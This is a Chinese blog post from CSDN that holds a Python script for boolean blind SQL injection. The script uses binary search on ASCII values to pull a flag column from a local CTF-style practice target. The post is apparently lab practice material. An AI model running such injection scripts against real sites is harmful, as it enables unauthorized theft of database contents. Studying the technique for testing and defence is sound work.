攻防_漏洞_SQL注入_bool盲注

已于 2024-02-04 14:39:39 修改
阅读量1.1k 收藏
点赞数
分类专栏: 攻防 文章标签: sql sql
于 2021-12-01 14:17:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/redglare/article/details/121653995
版权 
import requests
import string

url = 'http://127.0.0.1:18888/sql/p7/index.php?id=2' #url
flag = ''
print(len(string.printable))
for i in range(1,30):
    l,r = 32, 127
    while l < r:
        m = (l+r) // 2
        payload = '-if(ascii(substr((select group_concat(i_am_f1ag_column) from f1ag_table), %d, 1))>%d, 1, 0)' % (i, m)
        res = requests.get('%s%s' % (url, payload))
        if "id = 1" in res.text: # 判断回显信息
            # flag += chr(m)
            l = m+1
        else:
            r = m
    flag += chr(l)
    print(flag)
print(flag)
赤年
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL注入(盲注)
a12332251的博客
12-07 917
SQL
CTFHUB-WEB-SQL注入-时间盲注
weixin_49539962的博客
08-05 347
题目提示是使用时间盲注,并且不会有回显。解题的原理,是通过提交查询语句之后页面的刷新速度判断查询是否正确,如果正确从数据库中查找并返回response耗时比错误的语句稍长一些。但实际操作中受网络波动影响较大,使用sqlmap工具会方便很多。
SQL注入技巧-盲注暴库详细技巧及实例
10-11
个人通过拜读各位前辈们的博文以及大量的ctf题目训练,结合挖洞经验整理的几点sql常用的盲注技巧,结合具体的sql指令加深理解,针对常用的防护技术,总结了几种通用的绕过技巧
CTF从入门到提升(五) 部分截取函数及bool盲注相关例题分析
anquanniu的博客
08-27 543
bool盲注有区别与之前的基于时间的盲注bool盲注的页面输入会影响输出。 ​​我们来看操作理解一下: 语句结构id=1 ,我们去做判断的时候是id=1 and 1=1,and 1=1的本质是返回一个true,true可以用1来代替,正常回显。我们很多时候就会去接and=0,0类似于1=2返回是false, false类似于0的作用。 最后会影响到查询结果的是后面的0和1。 比如说触发查询...
Bugku Web CTF-sql注入2
No Title
01-14 661
这道题过滤了许多关键字,包括但不限于select、union、and、or等,还有许多符号比如注释符--,,、#等(需要注意的是这里的过滤是指针对uname字段的过滤)。 一开始没什么思路,于是参考网上其他人写的wp,发现主要集中于以下两种解法: 用扫描工具扫出存在的漏洞,即.DS_STORE泄漏问题,然后获取对应的文件目录,可以看到目录下有flag文件。 灵光一闪,直接猜出目录下有admin或...
php is_numberic函数造成的SQL注入漏洞
01-21
一、is_numberic函数简介国内一部分CMS程序里面有用到过is_numberic函数,我们先看看这个函数的结构bool is_numeric (mixed $var)如果 var 是数字和数字字符串则返回 TRUE,否则返回 FALSE。二、函数是否安全接下来...
MFC.rar_MFC bool_True
09-21
下面这些是和Win32程序...BOOL:布尔值,取值为TRUE or FALSE BSTR:32-bit 字符指针 BYTE:8-bit整数,未带正负号 COLORREF:32-bit数值,代表一个颜色值 DWORD:32-bit整数,未带正负号 LONG:32-bit整数,带正负号
yy.zip_bool insert
09-24
把在链表中插入语删除节点的操作写成一个函数。 bool insert(Node *&h,int a,int pos) pos(>=0)为0的时候在表头插入,否则在第pos个结点的后面插入。 bool remove(Node *&h,int &a,int pos)
abc.rar_ABC_BOOL CreateProcess_CreateProcess
09-24
通过函数 BOOL CreateProcess(LPCTSTR lpApplicationName,LPTSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD ...
bool-value.rar_bool value_布尔运算
09-14
"bool-value.rar"这个压缩包文件显然包含了一个与布尔运算相关的项目,其中涵盖了中缀表达式转换为后缀表达式(也称为逆波兰表示法)以及如何根据后缀表达式计算布尔值。接下来,我们将深入探讨这些概念。 **布尔...
SQL注入渗透与攻防(九)之布尔盲注
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-23 790
Web的页面的仅仅会返回True和False。那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。我们这里拿sql-libs的第五关来做演示,这是第五关的源代码:源码的意思大概是从id这个参数那里接收值,当这个值为true是输出You are in。。。。。false时什么都不输出。那我们是不是就可以利用这点结合上一篇文章讲解过的一些函数来进行猜解数据库呢?
布尔类型的SQL盲注注入
最新发布
m0_64368365的博客
02-20 1428
布尔盲注适用于无回显的情况,只有通过true或false及页面是否正常来判断所输入内容是否正确。
sql注入练习之bool盲注
windStudyer的专栏
05-22 1133
1.bool盲注的原理 以根据返回页面判断条件真假的注入 判断方式: 通过长度判断 length(): length(database())>=x 通过字符判断 substr():substr(database() ,1,1)= 's' 通过 ascII 码判断:ascii():ascii(substr(database(),1,1)) =x 2.bool盲注相关的函数 3.实验-bool盲注 实验环境:phpstudy+apache+mysql+pikachu 3.1判断注入
SQL注入Bool盲注(510cms)
qq_45775897的博客
01-05 2915
SQL注入之get可以参考: https://blog.csdn.net/qq_45775897/article/details/122332051 一、查找是否存在SQL注入注入点) 以510企业网站为例: 这里以漏洞参数id为例 用?id=1和id=1'进行测试,前提能够正常显示。 在?id=1后面加上and 1=1两个结果都是真的,所以正常输出; 后面加上and 1=2如果正常输出,说明前后都是真的,则表示是字符型。反之是数值型 eg: http://IP地址(域名)/news.php?cid=&
常见的Web漏洞——SQL注入
热门推荐
江左盟的博客
06-25 12万+
目录 SQL注入简介 SQL注入原理 SQL注入分类及判断 SQL注入方法 联合查询注入 基于bool盲注 基于时间的盲注 总结 SQL注入简介 SQL注入是网站存在最多也是最简单的漏洞,主要原因是程序员在开发用户和数据库交互的系统时没有对用户输入的字符串进行过滤,转义,限制或处理不严谨,导致用户可以通过输入精心构造的字符串去非法获取到数据库中的数据。本文以免费开源数据库My...
SQL注入学习——Bool盲注详解 sqli-labs(Less 8)
未完成的歌~的博客
07-29 6151
Less-7导出文件GET字符型注 打开页面输入?id=1 试了很多发现报错信息都一样,查看下源代码: if($row) { echo '<font color= "#FFFF00">'; echo 'You are in.... Use outfile......'; echo "<br>"; echo "</font>"; ......
SQL注入bool注入
studyphp123的博客
04-18 1236
一、预备知识 二、实验目的 三、实验工具 浏览器 四、实验环境 客户机一台 五、实验步骤 第一步:访问 http://www.any.com/sqli/Less-8/?id=1 页面正常: 第二步:加入单引号,访问 http://www.any.com/sqli/Less-8/?id=1' 不会报错,但是页面不正常,可以判断是bool注入: 第三步:判断列数(通过二分法) 1)输入:...
【CTF】关于SQL盲注的细节
publicStr的博客
11-29 2594
目录: 0x01 CTF题目中关于load_file()、char()、hex()、unhex()、like、过滤空格、过滤引号及相关问题 0x02 某简单题目中关于order by利用排序布尔盲注题目及源码 0x03 某CTF题解,盲注+泄露+反序列化       0x01 CTF题目中关于load_file()、char()、hex()、unhex()、like、过滤空格、过滤引...
数据库
c353796317的专栏
11-22 268
Oracle 用用户区分不同项目使用的数据库。 Mysql   用数据库区分不同项目使用的数据库。
__bool__()函数
07-31
回答: __bool__()函数是一个特殊方法,用于在Python中定义一个对象的布尔值。当我们对一个对象调用bool()函数时,实际上是调用了该对象的__bool__()方法。根据引用[1]和引用[2]的内容,当对数字使用bool()函数时,0...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

赤年

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值